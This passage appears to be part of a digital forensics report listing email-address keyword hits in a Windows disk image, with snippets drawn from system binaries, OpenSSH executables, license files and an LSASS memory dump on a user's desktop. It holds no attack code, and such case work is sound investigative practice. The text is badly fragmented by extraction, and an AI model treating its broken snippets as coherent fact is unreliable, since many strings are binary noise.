050508000000z 2505 dll_31bf3856ad364e35_10.0.17763.1_none_4c35abc135fd32d6/cr
Page 28/145
T
a
Preview Source File
g
s
ypt32.dll
ria de economia1$0" /img_disk.raw/vol_vol7/Windows/WinSxS/wow64_microsoft-

050508000000z 2505 dll_31bf3856ad364e35_10.0.17763.1_none_568a56136a5df4d1/cr
ypt32.dll
[email protected]
T
a
Preview Source File
g
s
itoldzie, odpisz na /img_disk.raw/vol_vol7/Program Files/Common Files/microsoft

«[email protected]« shared/ink/Alphabet.xml
. larry'emu t
itoldzie, odpisz na /img_disk.raw/vol_vol7/Windows/WinSxS/amd64_microsoft-windows-

«[email protected]« t..nputpersonalization_31bf3856ad364e35_10.0.17763.1_none_3071fcdb1
. larry'emu t e7da144/Alphabet.xml
[email protected]
T
a
Preview Source File
g
s
napisz do mnie - /img_disk.raw/vol_vol7/Program Files/Common Files/microsoft

«[email protected] shared/ink/Alphabet.xml
«. jaka jest {
napisz do mnie - /img_disk.raw/vol_vol7/Windows/WinSxS/amd64_microsoft-windows-

«[email protected] t..nputpersonalization_31bf3856ad364e35_10.0.17763.1_none_3071fcdb1e
«. jaka jest { 7da144/Alphabet.xml
Page 29/145
[email protected]
Ta
Preview Source File
gs
.onaudience.com1#0! /
«[email protected]«0 kj}z qkmk ;h c (0& img_disk.raw/vol_vol7/Users/Craig/Desktop/Procdu
mp/lsass.dmp
.onaudience.com1#0! /
«[email protected]«0 kj}z qkmk ;h c (0& img_disk.raw/vol_vol7/Users/Craig/Desktop/Procdu
mp/lsass.zip/lsass.dmp
[email protected]
T
a
Preview Source File
g
s
.mtin.es/mtin/ocsp0 /img_disk.raw/vol_vol7/ProgramData/Microsoft/Windows
[email protected] 3F8B6E8E40CCEDF3C2DD9B1556607E93976E5D46.bin.5B
.mtin.es/mtin/ocsp0 /img_disk.raw/vol_vol7/Users/Craig/Desktop/Procdump/lsass.dmp
[email protected]
.mtin.es/mtin/ocsp0 /
«[email protected]«0 img_disk.raw/vol_vol7/Users/Craig/Desktop/Procdump/lsass.zip/lsass.
[email protected] dmp
.mtin.es/mtin/ocsp0 /img_disk.raw/vol_vol7/Windows/SysWOW64/crypt32.dll
[email protected]
.mtin.es/mtin/ocsp0 /img_disk.raw/vol_vol7/Windows/System32/crypt32.dll
[email protected]
.mtin.es/mtin/ocsp0 /img_disk.raw/vol_vol7/Windows/WinSxS/amd64_microsoft-windows-
«[email protected]«0 crypt32-
[email protected] dll_31bf3856ad364e35_10.0.17763.1_none_4c35abc135fd32d6/crypt
32.dll
Page 30/145
T
a
Preview Source File
g
s
.mtin.es/mtin/ocsp0 /img_disk.raw/vol_vol7/Windows/WinSxS/wow64_microsoft-windows-
[email protected] dll_31bf3856ad364e35_10.0.17763.1_none_568a56136a5df4d1/crypt
32.dll
[email protected]
T
a
Preview Source File
g
s
s128-ctr aes192-ctr «aes128- /img_disk.raw/vol_vol7/Program Files/OpenSSH/ssh-add.exe

[email protected]« aes256-
gcm@openssh.
s128-ctr aes192-ctr «aes128- /img_disk.raw/vol_vol7/Program Files/OpenSSH/ssh-agent.exe

gcm@openssh.
s128-ctr aes192-ctr «aes128- /img_disk.raw/vol_vol7/Program Files/OpenSSH/ssh-keygen.exe

gcm@openssh.
s128-ctr aes192-ctr «aes128- /img_disk.raw/vol_vol7/Program Files/OpenSSH/ssh-keyscan.exe

gcm@openssh.
s192-ctr,aes256-ctr,«aes128- /img_disk.raw/vol_vol7/Program Files/OpenSSH/ssh.exe

[email protected]«,aes256-
gcm@openssh.
s128-ctr aes192-ctr «aes128- /img_disk.raw/vol_vol7/Program Files/OpenSSH/sshd.exe

gcm@openssh.
Page 31/145
T
a
Preview Source File
g
s
s128-ctr aes192-ctr «aes128- /img_disk.raw/vol_vol7/Windows/System32/OpenSSH/ssh-add.exe

gcm@openssh.
s128-ctr aes192-ctr «aes128- /img_disk.raw/vol_vol7/Windows/System32/OpenSSH/ssh-agent.exe

gcm@openssh.
s128-ctr aes192-ctr «aes128- /img_disk.raw/vol_vol7/Windows/System32/OpenSSH/ssh-

[email protected]« aes256- keygen.exe
gcm@openssh.
s128-ctr aes192-ctr «aes128- /img_disk.raw/vol_vol7/Windows/System32/OpenSSH/ssh-

[email protected]« aes256- keyscan.exe
gcm@openssh.
s192-ctr,aes256-ctr,«aes128- /img_disk.raw/vol_vol7/Windows/System32/OpenSSH/ssh.exe
[email protected]«,aes256-
gcm@openssh.
s128-ctr aes192-ctr «aes128- /img_disk.raw/vol_vol7/Windows/WinSxS/amd64_openssh-client-

[email protected]« aes256- components-
gcm@openssh. onecore_31bf3856ad364e35_10.0.17763.1_none_f0c3262e74c7e35
c/ssh-keyscan.exe
s192-ctr,aes256-ctr,«aes128- /img_disk.raw/vol_vol7/Windows/WinSxS/amd64_openssh-client-
[email protected]«,aes256- components-
gcm@openssh. onecore_31bf3856ad364e35_10.0.17763.1_none_f0c3262e74c7e35
c/ssh.exe
s128-ctr aes192-ctr «aes128- /img_disk.raw/vol_vol7/Windows/WinSxS/amd64_openssh-common-

gcm@openssh. onecore_31bf3856ad364e35_10.0.17763.1_none_ad6c66b207e8c4
78/ssh-add.exe

Page 32/145
T
a
Preview Source File
g
s
78/ssh-agent.exe

78/ssh-keygen.exe
[email protected]
T
a
Preview Source File
g
s
[email protected] /img_disk.raw/vol_vol7/Program Files/OpenSSH/ssh-add.exe

chacha20-poly1305@o
[email protected] /img_disk.raw/vol_vol7/Program Files/OpenSSH/ssh-agent.exe

chacha20-poly1305@o
[email protected] /img_disk.raw/vol_vol7/Program Files/OpenSSH/ssh-keygen.exe

chacha20-poly1305@o
[email protected] /img_disk.raw/vol_vol7/Program Files/OpenSSH/ssh-keyscan.exe

chacha20-poly1305@o
128- /img_disk.raw/vol_vol7/Program Files/OpenSSH/ssh.exe

[email protected],«aes256-
[email protected]«
fill_default_option
[email protected] /img_disk.raw/vol_vol7/Program Files/OpenSSH/sshd.exe

chacha20-poly1305@o
Page 33/145
T
a
Preview Source File
g
s
[email protected] /img_disk.raw/vol_vol7/Windows/System32/OpenSSH/ssh-add.exe
chacha20-poly1305@o
[email protected] /img_disk.raw/vol_vol7/Windows/System32/OpenSSH/ssh-
«[email protected]« agent.exe
chacha20-poly1305@o
«[email protected]« keygen.exe
chacha20-poly1305@o
«[email protected]« keyscan.exe
chacha20-poly1305@o
128- /img_disk.raw/vol_vol7/Windows/System32/OpenSSH/ssh.exe
[email protected],«aes256-
[email protected]« umac-64-
etm@openssh
[email protected] /img_disk.raw/vol_vol7/Windows/WinSxS/amd64_openssh-client-
«[email protected]« components-
chacha20-poly1305@o onecore_31bf3856ad364e35_10.0.17763.1_none_f0c3262e74c7e3
5c/ssh-keyscan.exe
128- /img_disk.raw/vol_vol7/Windows/WinSxS/amd64_openssh-client-
[email protected],«aes256- components-
[email protected]« umac-64- onecore_31bf3856ad364e35_10.0.17763.1_none_f0c3262e74c7e3
etm@openssh 5c/ssh.exe
[email protected] /img_disk.raw/vol_vol7/Windows/WinSxS/amd64_openssh-
«[email protected]« common-components-
chacha20-poly1305@o onecore_31bf3856ad364e35_10.0.17763.1_none_ad6c66b207e8c
478/ssh-add.exe
Page 34/145
T
a
Preview Source File
g
s
478/ssh-agent.exe
478/ssh-keygen.exe
[email protected]
Ta
Preview Source File
gs
2016 aleksey sanin /img_disk.raw/vol_vol7/Program Files/VMware/VMware

<«[email protected]«>. all rights Tools/open_source_licenses.txt
reserv
[email protected]
Ta
Preview Source File
gs
e from alex larson /img_disk.raw/vol_vol7/Program Files/VMware/VMware

<«[email protected]«>. Tools/open_source_licenses.txt
http://mail.gnome
[email protected]
T
a
Preview Source File
g
s
ista para continuar /

«[email protected]« img_disk.raw/vol_vol7/Windows/System32/DriverStore/FileRepository/
01.01.20007subiect prnms002.inf_amd64_6d7ddeebcacd2a6d/Amd64/FXSRES.DLL
Page 35/145
T
a
Preview Source File
g
s

«[email protected]« img_disk.raw/vol_vol7/Windows/System32/spool/drivers/x64/3/FXSRE
01.01.20007subiect S.DLL

«[email protected]« img_disk.raw/vol_vol7/Windows/WinSxS/amd64_dual_prnms002.inf_3
01.01.20007subiect 1bf3856ad364e35_10.0.17763.1_none_de4a75df21a850fc/Amd64/FX
SRES.DLL
[email protected]
T
a
Preview Source File
g
s
atarios de la lista /
01/01/20007assunto prnms002.inf_amd64_6d7ddeebcacd2a6d/Amd64/FXSRES.DLL
01/01/20007assunto S.DLL
01/01/20007assunto 1bf3856ad364e35_10.0.17763.1_none_de4a75df21a850fc/Amd64/FX
SRES.DLL
[email protected]
Ta
Preview Source File
gs
0r0 aamdppm_inst.nt «[email protected]« /

escp currentcontr@o img_disk.raw/vol_vol7/Windows/WinSxS/ManifestCache/4
Page 36/145
[email protected]
T
a
Preview Source File
g
s
rutyun amirjanyan, /
(«[email protected]«) img_disk.raw/vol_vol7/Windows/SystemApps/Microsoft.MicrosoftEdgeD
based on code init evToolsClient_8wekyb3d8bbwe/23/common/monaco-
editor/min/vs/language/html/htmlWorker.js
rutyun amirjanyan, /img_disk.raw/vol_vol7/Windows/WinSxS/amd64_microsoft-windows-

(«[email protected]«) m..oolsclient.appxmain_31bf3856ad364e35_10.0.17763.1_none_b0a21
based on code init 16e8181c150/htmlWorker.js
rutyun amirjanyan, /img_disk.raw/vol_vol7/Windows/WinSxS/amd64_microsoft-windows-

(«[email protected]«) m..oolsclient.appxmain_31bf3856ad364e35_10.0.17763.348_none_34a
based on code init 7b549aeff8c8c/htmlWorker.js
[email protected]
T
a
Preview Source File
g
s
fo; não topógrafo! /img_disk.raw/vol_vol7/Program Files/Common Files/microsoft

censo aponta
fo; não topógrafo! /img_disk.raw/vol_vol7/Windows/WinSxS/amd64_microsoft-windows-

«[email protected]« t..nputpersonalization_31bf3856ad364e35_10.0.17763.1_none_3071fcdb1e
censo aponta 7da144/Alphabet.xml
[email protected]
T
a
Preview Source File
g
s
i}" rjna ?11; 6d<'e /img_disk.raw/vol_vol7/ProgramData/Microsoft/Windows

lmb0 http://www.an 3F8B6E8E40CCEDF3C2DD9B1556607E93976E5D46.bin.5B
Page 37/145
T
a
Preview Source File
g
s
i}" rjna ?11; 6d<'e /img_disk.raw/vol_vol7/Users/Craig/Desktop/Procdump/lsass.dmp

lmb0 http://www.an
i}" rjna ?11; 6d<'e /

lmb0 http://www.an dmp
i}" rjna ?11; 6d<'e /img_disk.raw/vol_vol7/Windows/SysWOW64/crypt32.dll

i}" rjna ?11; 6d<'e /img_disk.raw/vol_vol7/Windows/System32/crypt32.dll

i}" rjna ?11; 6d<'e /img_disk.raw/vol_vol7/Windows/WinSxS/amd64_microsoft-windows-

lmb0 http://www.an dll_31bf3856ad364e35_10.0.17763.1_none_4c35abc135fd32d6/crypt3
2.dll
i}" rjna ?11; 6d<'e /img_disk.raw/vol_vol7/Windows/WinSxS/wow64_microsoft-windows-

lmb0 http://www.an dll_31bf3856ad364e35_10.0.17763.1_none_568a56136a5df4d1/crypt3
2.dll
[email protected]
T
a
Preview Source File
g
s
red. contact /img_disk.raw/vol_vol7/Program Files/Common Files/microsoft

m« for help. wi
Page 38/145
T
a
Preview Source File
g
s
red. contact /img_disk.raw/vol_vol7/Windows/WinSxS/amd64_microsoft-windows-

m« for help. wi 7da144/Alphabet.xml
[email protected]
Ta
Preview Source File
gs
c upporte opec alch /

«[email protected]« microso8ft-dg img_disk.raw/vol_vol7/Windows/WinSxS/ManifestCache/4
with 20eca21891c0180_blobs.bin
[email protected]
T
a
Preview Source File
g
s
_64, cryptogams by /img_disk.raw/vol_vol7/Program Files/VMware/VMware

<«[email protected]«> Tools/libeay32.dll
vwsuatauavaw vwsua
n by andy polyakov /img_disk.raw/vol_vol7/Program Files/VMware/VMware

<«[email protected]«> for Tools/open_source_licenses.txt
the openssl pr
_64, cryptogams by /img_disk.raw/vol_vol7/Program Files/VMware/VMware

<«[email protected]«> Tools/VMware VGAuth/libeay32.dll
vwsuatauavaw vwsua
x86, cryptogams by /
<«[email protected]«> img_disk.raw/vol_vol7/Users/Alan/AppData/Local/Microsoft/OneDriv
usvw \$ 1 \$ 1 _^[ e/18.143.0717.0002/libeay32.dll
x86, cryptogams by /
<«[email protected]«> img_disk.raw/vol_vol7/Users/Alan/AppData/Local/Microsoft/OneDriv
usvw \$ 1 \$ 1 _^[ e/18.143.0717.0002_1/libeay32.dll
Page 39/145
T
a
Preview Source File
g
s
_64, cryptogams by /
<«[email protected]«>fffffff img_disk.raw/vol_vol7/Windows/System32/Macromed/Flash/Flash.o
fffffff vws cx
_64, cryptogams by /img_disk.raw/vol_vol7/Windows/WinSxS/amd64_adobe-flash-for-

<«[email protected]«>fffffff windows_31bf3856ad364e35_10.0.17763.1_none_1c65cdebc1b8ff
fffffff vws c5/Flash.ocx
appversion@contextrequestdiagnosticsenabled8diagnosticscapabilityenabledlc
ontextresponselandingpagerelativepath.land
T
a
Preview Source File
g
s
xtrequestappversion /img_disk.raw/vol_vol7/Program
«appversion@contextrequestdiagnosticsenabled8diagno Files/WindowsApps/Microsoft.GetHelp_10.
sticscapabilityenabledlcontextresponselandingpagerelativ 1706.10441.0_x64__8wekyb3d8bbwe/Get
epath.land«ingpagerelativepath: Help.dll
[email protected]
T
a
Preview Source File
g
s
służbowy adres to - /img_disk.raw/vol_vol7/Program Files/Common Files/microsoft

w § 13 zapi
służbowy adres to - /img_disk.raw/vol_vol7/Windows/WinSxS/amd64_microsoft-windows-

«[email protected]«. t..nputpersonalization_31bf3856ad364e35_10.0.17763.1_none_3071fcdb1
w § 13 zapi e7da144/Alphabet.xml
Page 40/145
[email protected]
Ta
Preview Source File
gs
by ard biesheuvel /img_disk.raw/vol_vol7/Program Files/VMware/VMware

<«[email protected]«>. Tools/open_source_licenses.txt
permission to use
[email protected]
T
a
Preview Source File
g
s
use nuestro correo: /img_disk.raw/vol_vol7/Program Files/Common Files/microsoft

xian es una
use nuestro correo: /img_disk.raw/vol_vol7/Windows/WinSxS/amd64_microsoft-windows-

xian es una e7da144/Alphabet.xml
[email protected]
T
a
Preview Source File
g
s
use nuestro correo: /img_disk.raw/vol_vol7/Program Files/Common Files/microsoft

xian es una
use nuestro correo: /img_disk.raw/vol_vol7/Windows/WinSxS/amd64_microsoft-windows-

xian es una e7da144/Alphabet.xml
[email protected]
T
a
Preview Source File
g
s
n agent forwarding. «auth- /img_disk.raw/vol_vol7/Program Files/OpenSSH/ssh.exe

[email protected]«
Page 41/145
T
a
Preview Source File
g
s
ssh_session2_setup
n agent forwarding. «auth- /img_disk.raw/vol_vol7/Windows/System32/OpenSSH/ssh.exe

[email protected]« term
/dev/null dup(
n agent forwarding. «auth- /img_disk.raw/vol_vol7/Windows/WinSxS/amd64_openssh-client-

[email protected]« term components-
/dev/null dup( onecore_31bf3856ad364e35_10.0.17763.1_none_f0c3262e74c7e3
5c/ssh.exe
[email protected]
T
a
Preview Source File
g
s
an %d win %d max %d «auth- /img_disk.raw/vol_vol7/Program Files/OpenSSH/ssh.exe

[email protected]« proxied
to downstre
ccepted auth socket «auth- /img_disk.raw/vol_vol7/Program Files/OpenSSH/sshd.exe

[email protected]«
channel_post_auth_l
an %d win %d max %d «auth- /img_disk.raw/vol_vol7/Windows/System32/OpenSSH/ssh.exe

[email protected]« proxied
to downstre
an %d win %d max %d «auth- /img_disk.raw/vol_vol7/Windows/WinSxS/amd64_openssh-client-

[email protected]« proxied components-
to downstre onecore_31bf3856ad364e35_10.0.17763.1_none_f0c3262e74c7e3
5c/ssh.exe
Page 42/145
[email protected]
T
a
Preview Source File
g
s
n.min.js', /
'https://«b199c4f03a024452b8de58 img_disk.raw/vol_vol7/Users/Alan/AppData/Local/Packages/Mic
[email protected]«/206795', rosoft.MicrosoftEdge_8wekyb3d8bbwe/AC/#!
{"environm 001/MicrosoftEdge/Cache/KBBFFLP4/index[1].htm
b__331_0pcheckmodedeactivatedonbackbuttonproperty4ischeckmodeenabledp
roperty.itemcheckedpathproperty@checkboxesindicatorstyleproperty.show
T
a
Preview Source File
g
s
gindicatorcontainer>«b__331_0pcheckmodedeactivatedon /img_disk.raw/vol_vol7/Program
backbuttonproperty4ischeckmodeenabledproperty.itemche Files/WindowsApps/Microsoft.WindowsFe
[email protected] edbackHub_1.1805.2331.0_x64__8weky
w«checkboxesthreshold6 b3d8bbwe/PilotshubApp.dll
[email protected]
T
a
Preview Source File
g
s
e zijn e-mailadres: /img_disk.raw/vol_vol7/Program Files/Common Files/microsoft

het publiek
e zijn e-mailadres: /img_disk.raw/vol_vol7/Windows/WinSxS/amd64_microsoft-windows-

«[email protected]«. t..nputpersonalization_31bf3856ad364e35_10.0.17763.1_none_3071fcdb1e
het publiek 7da144/Alphabet.xml
[email protected]
T
a
Preview Source File
g
s
ebb85995028c_owner: /img_disk.raw/vol_vol7/Windows/WinSxS/amd64_microsoft-windows-
«[email protected]« hvsi-
Page 43/145
T
a
Preview Source File
g
s
custom:msip_label_f office_31bf3856ad364e35_10.0.17763.1_none_5c949f977156f0f5/WD
AGPlaceholder.docx
AGPlaceholder.pptx
AGPlaceholder.xlsx
custom:msip_label_f office_31bf3856ad364e35_10.0.17763.592_none_e05e35e69f02aa2a/
WDAGPlaceholder.docx
WDAGPlaceholder.pptx
WDAGPlaceholder.xlsx
[email protected]
T
a
Preview Source File
g
s
rizzo elettronico è /img_disk.raw/vol_vol7/Program Files/Common Files/microsoft

m«? trovò subit
Page 44/145
T
a
Preview Source File
g
s
rizzo elettronico è /img_disk.raw/vol_vol7/Windows/WinSxS/amd64_microsoft-windows-

«[email protected] t..nputpersonalization_31bf3856ad364e35_10.0.17763.1_none_3071fcdb
m«? trovò subit 1e7da144/Alphabet.xml
[email protected]
Ta
Preview Source File
gs
2007 benjamin berg /img_disk.raw/vol_vol7/Program Files/VMware/VMware

<«[email protected]«> this library Tools/open_source_licenses.txt
is f
[email protected]
T
a
Preview Source File
g
s
nmicrosoft.com oder /img_disk.raw/vol_vol7/Program

«[email protected] Files/WindowsApps/Microsoft.MicrosoftOfficeHub_17.8918.5926.0_x64__8
m« besitzen. korrigier wekyb3d8bbwe/VFS/ProgramFilesCommonX64/Microsoft
Shared/OFFICE16/MSOIDRES.DLL
[email protected]
T
a
Preview Source File
g
s
-id muss das format /img_disk.raw/vol_vol7/Program

soft.com« oder __8wekyb3d8bbwe/VFS/ProgramFilesCommonX64/Microsoft
benutzer@conto Shared/OFFICE16/MSOIDRES.DLL
[email protected]
Ta
Preview Source File
gs
instrumentation1'0% /
«[email protected]«0 |e}vn4 img_disk.raw/vol_vol7/Users/Alan/AppData/Local/Micro
Page 45/145
Ta
Preview Source File
gs
9un"u$ l0j0 soft/Windows/UsrClass.dat
instrumentation1'0% /
«[email protected]«0 |e}vn4 img_disk.raw/vol_vol7/Users/Alan/AppData/Local/Micro
9un"u$ l0j0 soft/Windows/UsrClass.dat.LOG1
[email protected]
T
a
Preview Source File
g
s
eden al1 lar1 kart1 /

«[email protected]« img_disk.raw/vol_vol7/Windows/System32/DriverStore/FileRepository/p
01.01.2000"" 0-9 v rnms002.inf_amd64_6d7ddeebcacd2a6d/Amd64/FXSRES.DLL

«[email protected]« img_disk.raw/vol_vol7/Windows/System32/spool/drivers/x64/3/FXSRES
01.01.2000"" 0-9 v .DLL

01.01.2000"" 0-9 v bf3856ad364e35_10.0.17763.1_none_de4a75df21a850fc/Amd64/FXSR
ES.DLL
[email protected]
T
a
Preview Source File
g
s
9 bjoern hoehrmann /img_disk.raw/vol_vol7/Program

<«[email protected]«> Files/WindowsApps/Microsoft.Office.OneNote_16001.10228.20003
permission is her .0_x64__8wekyb3d8bbwe/resources.pri
Page 46/145
[email protected]
T
a
Preview Source File
g
s
\u z^zca +o!/f' ; /img_disk.raw/vol_vol7/Windows/Fonts/msyhl.ttc

=^«[email protected]«ûmm
8mll f@@^^ )##=
\u z^zca +o!/f' ; /img_disk.raw/vol_vol7/Windows/WinSxS/amd64_microsoft-windows-

=^«[email protected]«ûmm f..microsoftyaheilight_31bf3856ad364e35_10.0.17763.1_none_46e80da
8mll f@@^^ )##= 6cb4ac01f/msyhl.ttc
[email protected]
Ta
Preview Source File
gs
) 2010 belen masia /img_disk.raw/vol_vol7/Program Files/VMware/VMware

(«[email protected]«) copyright (c) Tools/open_source_licenses.txt
2010
[email protected]
Ta
Preview Source File
gs
d@3-b32e c04f990bb «[email protected]« /

failed to create hi img_disk.raw/vol_vol7/Windows/WinSxS/ManifestCache/42
[email protected]
Ta
Preview Source File
gs
n by brendan o'dea /img_disk.raw/vol_vol7/Program Files/VMware/VMware

<«[email protected]«> available Tools/open_source_licenses.txt
from ftp
Page 47/145
[email protected]
Ta
Preview Source File
gs
please report to /img_disk.raw/vol_vol7/Program

«[email protected]« with steps Files/WindowsApps/Microsoft.Print3D_3.0.1521.0_x64__8wekyb3d
to repro 8bbwe/Print3D.exe
[email protected]
T
a
Preview Source File
g
s
i poslati e-mail na /img_disk.raw/vol_vol7/Program Files/Common Files/microsoft

«[email protected]«? shared/ink/Alphabet.xml
c:\windows\
i poslati e-mail na /img_disk.raw/vol_vol7/Windows/WinSxS/amd64_microsoft-windows-

«[email protected]«? t..nputpersonalization_31bf3856ad364e35_10.0.17763.1_none_3071fcdb1
c:\windows\ e7da144/Alphabet.xml
[email protected]
T
a
Preview Source File
g
s
microsoft.com eller /img_disk.raw/vol_vol7/Program

«. korriger den, og p wekyb3d8bbwe/VFS/ProgramFilesCommonX64/Microsoft
[email protected]
T
a
Preview Source File
g
s
ha f lgende format: /img_disk.raw/vol_vol7/Program

«[email protected] Files/WindowsApps/Microsoft.MicrosoftOfficeHub_17.8918.5926.0_x64_
oft.com« eller _8wekyb3d8bbwe/VFS/ProgramFilesCommonX64/Microsoft
bruker@contos Shared/OFFICE16/MSOIDRES.DLL
Page 48/145
[email protected]
Ta
Preview Source File
gs
en by bruno haible /img_disk.raw/vol_vol7/Program Files/VMware/VMware

<«[email protected]«>, 2003. this progr Tools/open_source_licenses.txt
[email protected]
T
a
Preview Source File
g
s
k blbbm bo*bo bq\bq /img_disk.raw/vol_vol7/Windows/Fonts/YuGothB.ttc

«[email protected]« bzdb{|b|
c#nc$>c%<c
k blbbm bo*bo bq\bq /img_disk.raw/vol_vol7/Windows/WinSxS/amd64_microsoft-windows-

«[email protected]« bzdb{|b| f..uetype-
c#nc$>c%<c yugothicbold_31bf3856ad364e35_10.0.17763.1_none_a01f0b47edff2df8
/YuGothB.ttc
[email protected]
Ta
Preview Source File
gs
xfc~bl curr` vers $(«[email protected]« {)\ /

{5f7f3f@7b-1170m img_disk.raw/vol_vol7/Windows/WinSxS/ManifestCache/420
eca21891c0180_blobs.bin
[email protected]
T
a
Preview Source File
g
s
ik heb het naar /img_disk.raw/vol_vol7/Program Files/Common Files/microsoft

gestuurd. in
ik heb het naar /img_disk.raw/vol_vol7/Windows/WinSxS/amd64_microsoft-windows-

gestuurd. in 7da144/Alphabet.xml
Page 49/145
[email protected]
T
a
Preview Source File
g
s
ja@s 8-!@8t @8la8al /img_disk.raw/vol_vol7/Windows/Speech/Engines/SR/en-US/l1033.ngr

«[email protected]«9 anmz:
':_g @:4e@:(
ja@s 8-!@8t @8la8al /img_disk.raw/vol_vol7/Windows/WinSxS/amd64_microsoft-windows-

«[email protected]«9 anmz: speechrecognizer-en-
':_g @:4e@:( us_31bf3856ad364e35_10.0.17763.1_none_a7d4b3ba449618b9/l1033.n
gr
[email protected]
T
a
Preview Source File
g
s
ity of illinois # «c- /img_disk.raw/vol_vol7/Program

[email protected]« Files/WindowsApps/Microsoft.MicrosoftOfficeHub_17.8918.5926.0_x64__8wek
http://casper.beck yb3d8bbwe/VFS/ProgramFilesCommonX64/Microsoft
Shared/OFFICE16/MSO99LRES.DLL
[email protected]
T
a
Preview Source File
g
s
viousurl dialogtype /img_disk.raw/vol_vol7/Windows/SysWOW64/mshtml.dll

«[email protected]«modald
ialogsessionid
viousurl dialogtype /img_disk.raw/vol_vol7/Windows/System32/mshtml.dll

«[email protected]«modald
ialogsessionid
viousurl dialogtype /img_disk.raw/vol_vol7/Windows/WinSxS/amd64_microsoft-windows-

«[email protected]«modald i..tmlrendering-
ialogsessionid legacy_31bf3856ad364e35_11.0.17763.1_none_36e978ca75598f85/ms
Page 50/145
T
a
Preview Source File
g
s
html.dll
viousurl dialogtype /img_disk.raw/vol_vol7/Windows/WinSxS/wow64_microsoft-windows-

«[email protected]«modald i..tmlrendering-
ialogsessionid legacy_31bf3856ad364e35_11.0.17763.1_none_413e231ca9ba5180/ms
html.dll
[email protected]
T
a
Preview Source File
g
s
sha256 ca, level 11 /

«[email protected]« img_disk.raw/vol_vol7/Users/Alan/AppData/Local/Packages/Microsoft.Microsof
20190816191730z0v tEdge_8wekyb3d8bbwe/AC/#!
0t 001/Microsoft/CryptnetUrlCache/Content/D388BEBC625C181AB8B0CA40E71
81396_5701F457C4E7A7E601F580C8B8673C55
sha256 ca, level 11 /img_disk.raw/vol_vol7/Users/Craig/Desktop/Procdump/lsass.dmp

0 190307104108z
2104
sha256 ca, level 11 /img_disk.raw/vol_vol7/Users/Craig/Desktop/Procdump/lsass.zip/lsass.dmp

0 190307104108z
2104
[email protected]
T
a
Preview Source File
g
s
_cancel_streamlocal «cancel- /img_disk.raw/vol_vol7/Program Files/OpenSSH/ssh.exe

streamlocal-
[email protected]«
channel_update_perm
Page 51/145
T
a
Preview Source File
g
s
amlocal forwarding. «cancel- /img_disk.raw/vol_vol7/Program Files/OpenSSH/sshd.exe

streamlocal-
[email protected]«
server_input_global
_cancel_streamlocal «cancel- /img_disk.raw/vol_vol7/Windows/System32/OpenSSH/ssh.exe

streamlocal-
[email protected]«
channel_update_perm
_cancel_streamlocal «cancel- /img_disk.raw/vol_vol7/Windows/WinSxS/amd64_openssh-

streamlocal- client-components-
[email protected]« onecore_31bf3856ad364e35_10.0.17763.1_none_f0c3262e74
channel_update_perm c7e35c/ssh.exe
[email protected]
Ta
Preview Source File
gs
2011 lauri kasanen /img_disk.raw/vol_vol7/Program Files/VMware/VMware

(«[email protected]«) all rights reserve Tools/open_source_licenses.txt
[email protected]
T
a
Preview Source File
g
s
e-mail colpì zeno: /img_disk.raw/vol_vol7/Program Files/Common Files/microsoft

«cannibale_qui@example. shared/ink/Alphabet.xml
com«. la formula,
e-mail colpì zeno: /img_disk.raw/vol_vol7/Windows/WinSxS/amd64_microsoft-windows-

«cannibale_qui@example. t..nputpersonalization_31bf3856ad364e35_10.0.17763.1_none_3071fcd
com«. la formula, b1e7da144/Alphabet.xml
Page 52/145
[email protected]
T
a
Preview Source File
g
s
xvk h{n3 lj!@ `vgce /img_disk.raw/vol_vol7/ProgramData/Microsoft/Windows

«[email protected]«/ca0f Defender/Scans/mpcache-
_0]ca_crlca ]4t 3F8B6E8E40CCEDF3C2DD9B1556607E93976E5D46.bin
{n3 lj!@ `vgce vhfq /img_disk.raw/vol_vol7/ProgramData/Microsoft/Windows

«[email protected]« Defender/Scans/mpcache-
http://www.disig.sk 3F8B6E8E40CCEDF3C2DD9B1556607E93976E5D46.bin.5B
{n3 lj!@ `vgce vhfq /img_disk.raw/vol_vol7/Users/Craig/Desktop/Procdump/lsass.dmp

http://www.disig.sk
{n3 lj!@ `vgce vhfq /

«[email protected]« img_disk.raw/vol_vol7/Users/Craig/Desktop/Procdump/lsass.zip/lsass.
http://www.disig.sk dmp
{n3 lj!@ `vgce vhfq /img_disk.raw/vol_vol7/Windows/SysWOW64/crypt32.dll

{n3 lj!@ `vgce vhfq /img_disk.raw/vol_vol7/Windows/System32/crypt32.dll

{n3 lj!@ `vgce vhfq /img_disk.raw/vol_vol7/Windows/WinSxS/amd64_microsoft-windows-

http://www.disig.sk dll_31bf3856ad364e35_10.0.17763.1_none_4c35abc135fd32d6/crypt
32.dll
{n3 lj!@ `vgce vhfq /img_disk.raw/vol_vol7/Windows/WinSxS/wow64_microsoft-windows-

http://www.disig.sk dll_31bf3856ad364e35_10.0.17763.1_none_568a56136a5df4d1/crypt
32.dll
Page 53/145
[email protected]
Ta
Preview Source File
gs
hristian biesinger /img_disk.raw/vol_vol7/Program Files/VMware/VMware

<«[email protected]«> alternatively, Tools/open_source_licenses.txt
th
[email protected]
T
a
Preview Source File
g
s
[email protected] /img_disk.raw/vol_vol7/Program Files/OpenSSH/ssh-add.exe

«chacha20-
[email protected]« failed
to retrieve
[email protected] /img_disk.raw/vol_vol7/Program Files/OpenSSH/ssh-agent.exe

«chacha20-
[email protected]«
md5sha1 sha256 sha3
[email protected] /img_disk.raw/vol_vol7/Program Files/OpenSSH/ssh-keygen.exe

«chacha20-
to retrieve
[email protected] /img_disk.raw/vol_vol7/Program Files/OpenSSH/ssh-keyscan.exe

«chacha20-
[email protected]«
md5sha1 sha256 sha3
~/.ssh/known_hosts2 «chacha20- /img_disk.raw/vol_vol7/Program Files/OpenSSH/ssh.exe

[email protected]«,aes12
8-ctr,aes192-c

«chacha20-
[email protected]« hmac-
sha1 hmac-sha1
Page 54/145
T
a
Preview Source File
g
s
«chacha20- add.exe
to retrieve
«chacha20- agent.exe
[email protected]«
md5sha1 sha256 sha3
«chacha20- keygen.exe
to retrieve
«chacha20- keyscan.exe
[email protected]«
md5sha1 sha256 sha3
~/.ssh/known_hosts2 «chacha20- /img_disk.raw/vol_vol7/Windows/System32/OpenSSH/ssh.exe

[email protected]«,aes12
8-ctr,aes192-c
«chacha20- components-
